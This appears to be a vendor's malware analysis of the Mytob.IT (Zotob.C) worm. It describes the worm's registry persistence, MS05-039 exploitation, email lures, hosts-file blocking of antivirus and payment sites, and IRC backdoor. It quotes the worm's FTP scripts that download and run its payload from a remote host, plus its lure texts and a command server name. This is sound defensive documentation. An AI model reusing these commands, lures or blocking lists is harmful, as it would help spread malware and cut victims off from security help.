Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.IT

   
Aliases: W32/Zotob.worm.c, W32/Zotob-C, W32.Zotob.C@mm, Zotob.C, WORM_ZOTOB.C
Type: Internet Worm
Affect: 32-bit Windows

Mytob.IT is a 31744 byte worm that is runtime packed by UPack. Upon execution, the worm copies itself into the System32 folder as "per.exe".

The worm creates a mutex "B-O-T-Z-O-R" to avoid multiple running instances of the worm on one machine.

The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEM" = "per.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINDOWS SYSTEM" = "per.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present anymore.

Mytob.IT also modifies the following registry key:

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
"Start" = "4"

Changing this key lowers security settings on the compromised system.

Note: This will disable the Shared Access on Windows NT based systems.

The worm generates random IP addresses and attempts to connect on port 445 of the generated IP's to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using 2pac.txt FTP-Commands file)

Note: The worm creates a task, "SCAN", for this purpose.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get haha.exe
quit

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "haha.exe" from the connecting system, and starts this file after downloading.

Note: The worm might also generate the file "ii" with the following FTP Script Commands:

open %IP% %TCP port%
user a a
binary
get lol.exe
bye

The FTP Server is using port 33333

The worm scans all fixed disks and collects e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl, *.txt, *.xml, *.cgi, *.jsp

Due to a bug implementing stringcat and compare with the WIN32_FIND_DATA results these extensions are a superset of the extensions scanned. The worm will always open and scan a file for e-mail addresses when at least one character matches one of the characters in the file extension list in the correct order. This is because the worm compares the file extension using 'instring function/substring function'.

For example, when the worm searches for e-mail addresses in files with the extension .htm, the bug in the worm will cause it to also open and search files with the extensions .h, or .ht.

Mytob.IT collects also e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files
%System%

Mytob.IT performs DNS e-mail-exchange-queries to find an appropriate mail server for each domain it tries to send itself to. If this DNS request for the mailserver fails, the worm tries to guess the e-mail server by adding the following prefixes in front of the domain name:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.

Mytob.IT randomly selects an e-mail subject out of the following list:

Warning!!
**Warning**
Hello
Confirmed...
Important!

The e-mail contains one of the following message texts:

Looooool
We found a photo of you in ...
That's your photo!!?
hey!!
0K here is it!

The worm attaches one of the following file names with a self-copy:

photo
your_photo
image
picture
sample
loool
webcam_photo

with one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

bmp
jpg
jpeg

The second extension is chosen from the following list and is separated from the first extension by a huge amount of spaces to hide the executable file extension:

pif
scr
exe

The worm avoids e-mail addresses which contain parts of the following list:

abuse, security, admin, support, contact, webmaster, info, samples, postmaster, webmaster,
noone, nobody, nothing, anyone, someone, your, you, me, bugs, rating, site, contact, soft,
no, somebody, privacy, service, help, not, submit, feste, ca, gold-certs, the.bat, page

It also avoids e-mail domains which contain parts of the following list:

avp, syma, icrosof, msn., hotmail, panda, sopho, borlan, inpris, example, mydomai, nodomai, ruslis, .gov, gov., .mil, foo., unix, math, bsd, mit.e, gnu, fsf., ibm.com, google, kernel, linux, fido, usenet, iana, ietf, rfc-ed, sendmail, arin., ripe., isi.e, isc.o, secure, acketst, pgp, tanford.e, utgers.ed, mozilla, icrosoft, support, ntivi, unix, bsd, linux, listserv, certific,
google, account

Mytob.IT overwrites the hosts file with the following data to prevent users from accessing these sites:

Botzor2 pnp+asn+mail spread. Greetz to good friend Coder. Based On HellBot3
{removed due to vulgar words}
n127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com

Other Details:

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components

It tries to connect to the irc server diabl0.turkcoders.net.

References:

http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx

History: Analysis and Write-up by: Michael St. Neitzel